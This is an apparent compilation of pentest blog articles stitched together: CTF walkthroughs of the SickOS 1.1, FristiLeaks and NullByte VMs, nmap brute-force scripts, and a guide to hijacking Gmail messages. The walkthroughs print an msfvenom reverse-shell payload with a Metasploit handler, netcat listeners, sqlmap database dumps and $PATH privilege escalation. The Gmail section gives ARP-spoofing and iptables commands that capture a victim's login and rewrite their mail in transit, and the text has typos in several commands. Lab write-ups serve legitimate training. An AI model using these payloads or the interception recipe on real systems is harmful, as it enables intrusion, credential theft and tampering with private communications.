Hack the SickOS 1.1 VM (CTF Challenge)

Hack the SickOS 1.1 VM (Boot2root)

This time we are going to crack SickOS 1.1 in the Boot2root challenges. This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. The objective being to compromise the network/machine and gain Administrative/root privileges on them.

Breaching Methodology:

·         Network Scanning (Netdiscover, Nmap)

·         Configure browser proxy

·         Use robort.txt

·         Search Wolf CMS admin login page & default credential (Google)

·         Enter into the admin console

·         Generate PHP Backdoor (Msfvenom)

·         Upload and execute a backdoor

·         Reverse connection (Metasploit)

·         Steal password from inside config.php

·         Get into the shell for privilege escalation

·         Import python one-liner for proper TTY shell

·         Open etc/passwd

·         Switch user (su) and submit the stolen password

·         Take root access

We will start off by finding the target.

 netdiscover

Our target IP is 192.168.1.101. Now we scan the IP by Nmap.

nmap –p- -A 192.168.1.101

If you had have observed during nmap that there was something about proxy on 3128. So we will try and set up a manual proxy. Give the IP of the VM in the HTTP Proxy and the port 3128

Generally, there are always some chances of getting robots.txt file inside web directory, therefore, while penetrating any system we should always check for the robots.txt file. Here also it works and it tells us something about /wolfcms that means this website is made in Wolf CMS or there is a directory with the name of /wolfcms. 

Then open it in the browser as the link: 192.168.1.101/wolfcms/ and the page will open as below indicating that it has been made in Wolf CMS.

I don’t know much about Wolf CMS so I searched Google to know where admin page resides. As I found the login page through Google, I opened it. And it was asking me for username and password. By default, the username and password is admin and admin respectively and I logged into the admin console, after that, select files tab and then select upload files option.

Here, we need to upload the malicious file and to generate it open your terminal in kali and type:

Msfvenom –p php/meterpreter/reverse_tcp lhost =192.168.1.108 lport=4444 –f raw

On other hand run multi/handler inside Metasploit framework.

Copy the code from  to die(); and paste it to a text file with the extension .php. Upload the said file.

As we can see, that the PHP backdoor has been uploaded inside /public directory

So now when we need to execute shell.php file for getting the reverse connection on metasploit.

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.108

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session1, now start penetrating for accessing root privilege. We have access /var/www/wolfcms where we found config.php file. So when had opened config.php file it has shown DB username and password.

Then to access proper TTY shell we had import python one line script by typing following:

python -c 'import pty;pty.spawn("/bin/bash")'

Moving further read the password file and to do so type:

cat etc/password

Observe all the user details it gives us and you will find that user sickos has the value of 1000:1000 that means that this is the first user. So, we might find odour here as it is the first user. Therefore, switch user to sickos with the password john@123 that we found.

su sickos

sudo -s

Furthermore, we need to go into /root to look for the flag so for that run the set of following commands:

cd /root

ls

Here, you will find a text find. Let’s read it.

HUUURRRRAYYY!!! We have successfully completed this challenge.

Password Cracking using Nmap

In previous practical I had used basic command to scan victim's PC and found open ports like ftp, Ssh, telnet, snmp and etc. You can check from here.  But now the question is if we found open ports what else we can do to retrieve the information of victim using nmap scripts? To know your answer read ahead.

FTP BRUTE

Crack password using nmap brute script of FTP.

nmap -p21 --script ftp-brute.nse --script-args

userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

From the scanning result I have successfully got the FTP password of victim pc

msfadmin:msfadminas username and password.

TELNET BRUTE

Crack password using nmap brute script of telnet.

nmap -p23 --script telnet-brute.nse --script-args

userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

I have successfully got the TELNET password of victim pc msfadmin:msfadminas username and password.

SMB BRUTE

Crack password using nmap brute script of SMB

Nmap –p445 --script smb-brute.nse --script-args

userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

I have successfully got the SMB password of victim pc msfadmin:msfadmin and user:useras username and password.

MYSQL BRUTE

Crack password using nmap brute script of MYSQL server

Nmap  -sT -p3306 --script mysql-brute.nse --script-args

userdb=/root/Desktop/user.txt 192.168.1.105

Here I found two user as root and guest with empty password for MySQL server

Hack the Fristileaks VM (CTF Challenge)

Today we will walk through the FristiLeaks VM. There is nothing that we know about this VM except for the fact that security level is from beginner to intermediate. Also this VM only works on 08:00:27:A5:A6:76MAC address or else it will not work.

You can download it from here: https://www.vulnhub.com/entry/fristileaks-13,133/

Task: Get root Access and Capture the Flag

Level: Intermediate

Penetrating Methodology

·         Scanning Network

·         Enumeration

·         Exploiting Web Application

·         Post Exploit Enumeration

·         Privilege Escalation

·         Capture the Flag

WalkThrough

Scanning Network

Let’s start by scanning your victims’ IP.

nmap -A 19.168.1.110

Nmap shows us that port number 80 is open. Therefore, let’s open our victim’s IP in the browser.

Enumeration

Exploring the webpage, it occurred to me that fristi is also a drink like cola or beer or sisi and also there was reference to it on the home page so there is possibility that fristi is also a directory here. And there was no harm in trying it.

And we found the login portal through fristi. Cheers. Once I looked at the source page of this directory, I found what I think is a username.

Also, by reading the metadata of the image which was encoded as indicated in the page source I found a string of letters. To decode type:

base64 -d encode > 1.png

Exploiting

Then, we made up a php_reverse shell (available inside: /usr/share/webshells/php), in the form of .jpg and modified lhost and lport values.

And then uploaded this shell in 192.168.1.110/fristi/do_upload.php.

And then we executed our shell by typing:

192.168.1.110/fristi/uploads/shell/php.jpg

Then through netcat we will listen in and get a session while navigating around:

nc -lvp 1234

cd /home

ls

cd eezpeez

ls -la

Post Exploit Enumeration

So, in /eezpeez directory we found notes.txt file. Let’s read it:

cat notes.txt

Again in the notes.txt there is message from jerry telling us what to do. So let’s follow his steps by typing:

echo “/home/admin/chmod –R 777 /home/admin” > /tmp/runthis

After typing the command go back to home folder and from there go into the admin directory.

cd /tmp

cd /home/admin

ls -la

Now, in the above image, you can see that it said that the code is allows the string to be encrypted so now, save the script in your kali and then change the word ‘base64string’ to ‘decoded’ in the script and finally use the following command to decrypt it :

python cryptpass,py =%Rn0AKnlMHMPIzpyuTI0ITG

And the decoded string is ‘LetThereBeFristi!’

Privilege Escalation

Now this may be the password to fristigod user. So let’s try and use it. For this we need to switch user so, type the following command:

su fristigod

Enter ‘LetThereBeFristi’ as a password. Then I explored fristigod folder and there I found the history file. In this history file, there was one command that was used over and over again with sudo permissions:

cd /var/fristigod

ls -lsa

cat bash.history

So let’s check sudo right for the said command to work. Therefore type:

sudo -l

It will ask for password for fristigod, use the same password as above. Then to give rights type:

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

id

cd /root

ls

cat fristileafs_secrets.txt

Then by navigating around using the above commands, I found a text file. By reading the contents of the file you can see that you have found second/last flag.

And VOILA!! This way you solve another CTF called fristileaks. Happy Pentesting!!

Hijacking Gmail Message on Air using Burpsuite

There are various vibrant attacks of burpsuite that many not know off; therefore we will try one for those in this article today. We will learn how to get between the networks of gmail and then to change the message o the mail before it reaches receiver.

First of all, go to the terminal of Kali and type:

arspoof -i wlan0 -t 192.168.100.4 192.168.100.1

Here,

-i --> interface

wlan0 --> network (This can be either ethernet or wlan depending on your victim i.e. if your victim is using eth0 then you should also use eth0)

-t --> target

192.168.100.4 --> Victim IP

192.168.100.1 --> DNS

Execution of the above command will capture the packets that are sent from victim to router. And once we have captured these packets we will open another terminal in Kali and type the following command which will make us capture all the packets from router to victim.

arpspoof -i wlan0 -t 192.168.100.1 192.168.100.4

Here,

-i --> interface

wlan0 --> network

-t --> target

192.168.100.1 --> DNS

192.168.100.4 --> victim IP

This command will capture packets that are sent from router to victim IP. Now type the following the command so that IP forwarding is enabled in our PC.

echo 1 > /proc/sys/net/ipv4/ip_forward

Then type the following the command so that all the packets on port 80 will go through our IP.

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to -desitination 192.168.100.5

Then type the following the command so that we can all the packets on port 443 will go from our IP.

iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to -desitination 192.168.100.5

After all this is done then open burpsuite and go to proxy tab and then select options tab. Once you have reached here click on Add button.

Clicking on Add button will make the following options appear. In this give port no 80 in the box adjacent to bind to port and in specific address give your IP.

Further on, Select Request Handling tab and check Support invisible proxy. And then click on ok.

Repeat the above steps for Port no 443 too.

After clicking on ok make sure all the boxes of running and invisible are check.

When the victim will sign in his/her gmail account we have its data captured in burpsuite.

And all this captured data will contain username and password of the victim as shown below.

Here is the closer view to the username and password.

The victim will type and send the message without suspicion:

But as the victim will click on send button its mail will come to us before reaching destination.

Now you can change the text of the message by a simple left click on the message area and type your message as I changed HELLO THIS IS TESTING to YOU HAVE BEEN HACKED.

Once you change the message then click on Forward button on the top left side and the mail will go forward to its destination as shown below:

Hack the NullByte VM (CTF Challenge)

This is our article on root2boot penetration testing challenge. We will walk through an exploitable framework of NullByte VM. Breaking into it isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. We have to find "Proof.txt" and follow the further steps. You can download it from here.

Penetrating Methodology:

Network Scanning (Nmap, netdiscover)

Information Gathering

§  Exacting hidden text from an image(Exiftool)

§  Dictionary Attack using rockyou.txt(Brup suite)

Steal Database information via Sql injection (SQLMAP)

Login to SSH

Find SUID Binaries

Privilege Escalation by Manipulating $PATH

Get Root access and capture the flag.

Let's Begin the Game!!!

 Start off by finding your target by running netdiscover on the terminal of attacking machine.

Our target is 192.168.1.142. And now that we know our target, we will scan it using nmap.

nmap -A 192.168.1.142

Scanning the IP, we will know that the port number 80, 111, 777, 44607 are open. Please observe here that the service of SSH is forwarded from 22 to 777 port. This port may come in handy in the future to gain access.

Now we will try and open the targeted IP in the browser.

There is an image and a quote on the page. You will find nothing on the page source or otherwise. But there might be something hidden in the image and so, we will read the image using EXIF tool, therefore, download this image.

exiftool main.gif

There you will find a comment kzMb5nVYJw. Now this might be a directory and there is no harm in opening it the browser so let’s do that

Our assumption was right as it opened in the browser. But it is asking for a key. And we have no idea what the key is so, therefore, we will use the dictionary attack to find the key using BurpSuite and rockyou.txt. Through the dictionary attack, you will find the key i.e. elite.

Through the dictionary attack, you will find the key i.e. elite. Enter the key where it was asking and the new web page will get opened which will be asking for username, BUT this time also we do not know the username. So, we will find it in its Database using sqlmap. And for this type:

sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 --dbs --batch

It will give you the name of the database i.e. seth.  

Now further we will find columns and tables and for that type:

sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth  --dump-all --batch

Once command executes, it will show you the table name along with column and password as shown:

As a result, we have username and password but the password is in MD5 so we need to crack it and there are many online tools to do so. Therefore to crack it go to md5coder.org and give the md5 value there and click on ok and it will show you the original word i.e. omega

Now we will SSH to log in and for that type:

ssh ramses@192.168.1.142 -p 777

And then give omega as the password. And you are logged in. As you are now logged in type the following command to see the list of directories:

Then by using the following command, you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

We found that SUID bit enabled for /var/www/backup/prowatch which was quite attention-grabbing. So we decide to explore it for further steps.

cd /var/www/bakcup/

./procwatch

So when I run the above command, it looks like the procwatch file is trying to run ps and this is a genuine file inside /bin for Process status. The most important things which could be considered here that the author has set SUID bit ON for procwatch and might be it could be any small program file which is calling system function such as ps.

Taking its advantage, we can escalate the root privilege and hit the goal of this VM. To achieve this we will have to manipulate the environment PATH variable. If we can get procwatch to run sh instead of ps, it should give us root shell. Following techniques is called Linux Privilege escalation using environment $PATH variable and their so many methods to manipulate environment variable.

1^st Method

echo “/bin/sh”  > /ps

chmod 777 ps

echo $PATH

export PATH=.:$PATH

echo $PATH

./procwatch

Due to ‘.’ in $PATH means that the user is able to execute binaries/scripts from the current directory. With us execution of above commands we will enter root and then further type ;

 id

cd /root

ls

cat proof.txt

2^nd Method

cp /bin/sh /tmp/ps

echo $PATH

export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

./procwatch

With us execution of above commands we will enter root and then further type ;

 id

cd /root

ls

cat proof.txt

3^rd Method

vi ps

Once vi editors get open type /bin/sh and save the file.

chmod 777 ps

echo $PATH

export PATH=.:$PATH

cd /var/www/backup

./procwatch

With us execution of above commands we will enter root and then further type ;

id

cd /root

ls

cat proof.txt